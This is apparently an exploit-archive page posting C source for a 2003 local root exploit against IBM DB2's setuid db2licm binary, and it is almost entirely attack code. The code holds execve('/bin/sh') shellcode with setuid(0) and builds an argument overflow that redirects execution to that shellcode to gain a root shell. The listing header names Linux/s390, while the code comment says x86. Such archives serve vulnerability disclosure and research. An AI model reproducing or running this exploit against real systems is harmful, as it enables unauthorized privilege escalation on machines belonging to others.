IBM-DB2-db2licm.c

IBM-DB2-db2licm.c: Posted Sep 26, 2003; Authored by Juan Manuel Pascual Escriba | Site concepcion.upv.es; Local root exploit for IBM DB2 Universal Database version 7.2 for Linux/s390 which makes use of the db2licm binary that is setuid by default.; tags | exploit, local, root; systems | linux; advisories | CVE-2003-0758, CVE-2003-0759; SHA-256 | ccb20c18f85e2c98e30d47ca465bac0c1611eb9129899f18dfd2745dcb29c56e; Download | Favorite | View

IBM-DB2-db2licm.c


/* 
  Local Exploit for db2licm 
  IBM db2 v 7.1 Linux/x86 

  vulnerability researched by 
  Juan Manuel Pascual Escriba
  04/08/2003 Barcelona - Spain
  pask@uninet.edu

  http://concepcion.upv.es/~pask

   
 */



char sc[]=
"\x31\xc0"      /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


#define STACK_TOP_X86 0xC0000000
#define ALG_MASK 0xfffffff4
#define ADDR 1000
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm"

#define DFL_ALG 4       

int main(int arc, char **arv){
        char *argv[3];
        char *envp[2];
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;



        sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - 1;
        printf("shellcode address = 0x%X\n",sc_address);


        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %d trailing bytes to backward align Shellcode to 0x%X\n", ba,
sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%X\n",sc_address);
        }

        envp[0] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = envp[0];
        strcpy(q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;
        memset(q,'A',ba);
        q += ba;
        *q = 0;
        envp[1] = 0;

        /* build overflowing arvg[2] */


        printf("using alignment = %d in overflow buffer\n",alg);

        argv[0] = DB2LICM;
  argv[1] = "-a";
        argv[2] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1);
        memset(argv[2],'A',alg);
        p=(unsigned long*)(argv[2]+alg);
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        };
        *p = 0;
        argv[3] = 0; 

        printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp); 


}

Top Authors In Last 30 Days

Red Hat 278 files
Ubuntu 57 files
Gentoo 32 files
Debian 28 files
Apple 9 files
malvuln 6 files
Ahmet Umit Bayram 5 files
nu11secur1ty 5 files
Adam Gowdiak 4 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,630)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,779)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,501)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

IBM-DB2-db2licm.c

IBM-DB2-db2licm.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IBM-DB2-db2licm.c

Share This

IBM-DB2-db2licm.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems